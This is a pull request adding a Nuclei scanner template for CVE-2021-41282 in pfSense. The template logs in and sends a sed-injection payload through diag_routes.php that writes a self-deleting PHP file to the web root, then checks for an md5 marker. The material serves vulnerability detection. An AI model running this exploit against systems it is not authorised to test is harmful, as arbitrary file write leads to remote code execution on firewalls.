### PR TITLE
add CVE-2021-41282

### DIFF
--- a/cves/2021/CVE-2021-41282.yaml
+++ b/cves/2021/CVE-2021-41282.yaml
@@ -1,0 +1,50 @@
+id: CVE-2021-41282
+
+info:
+  name: pfSense arbitrary write file to RCE
+  author: cckuailong
+  severity: high
+  description: diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (i.e., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location.
+  reference:
+    - https://www.shielder.it/advisories/pfsense-remote-command-execution/
+    - https://www.rapid7.com/db/modules/exploit/unix/http/pfsense_diag_routes_webshell/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-41282
+  tags: cve,cve2021,pfsense,rce,auth
+
+requests:
+  - raw:
+      - |
+        GET /index.php HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        __csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=
+
+      - |
+        GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x3c\x3fphp+var_dump(md5(\x27CVE-2021-41282\x27));unlink(__FILE__)\x3b\x3f\x3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /test.php HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    extractors:
+      - type: regex
+        name: csrf_token
+        part: body
+        internal: true
+        group: 1
+        regex:
+          - '(sid:[a-z0-9,;:]+)'
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(body, 'c3959e8a43f1b39b0d1255961685a238')"
+          - "status_code==200"
+        condition: and

--- a/cves/2021/CVE-2021-41282.yaml
+++ b/cves/2021/CVE-2021-41282.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-41282
 
 info:
-  name: pfSense arbitrary write file to RCE
+  name: pfSense Arbitrary File Write to RCE
   author: cckuailong
   severity: high
   description: diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (i.e., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location.
@@ -9,7 +9,7 @@ info:
     - https://www.shielder.it/advisories/pfsense-remote-command-execution/
     - https://www.rapid7.com/db/modules/exploit/unix/http/pfsense_diag_routes_webshell/
     - https://nvd.nist.gov/vuln/detail/CVE-2021-41282
-  tags: cve,cve2021,pfsense,rce,auth
+  tags: cve,cve2021,pfsense,rce,authenticated
 
 requests:
   - raw:


### PR DESCRIPTION
### Template / PR Information

pfSense arbitrary write file to RCE

P.S. pfsense is a firewall software

- References:
 https://www.shielder.it/advisories/pfsense-remote-command-execution/
 https://www.rapid7.com/db/modules/exploit/unix/http/pfsense_diag_routes_webshell/
 https://nvd.nist.gov/vuln/detail/CVE-2021-41282

### Template Validation

I've validated this template locally?
- YES

<img width="1288" alt="1" src="https://user-images.githubusercontent.com/10824150/156952118-b6896596-a687-499c-9c38-a9ba857403b0.png">


### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)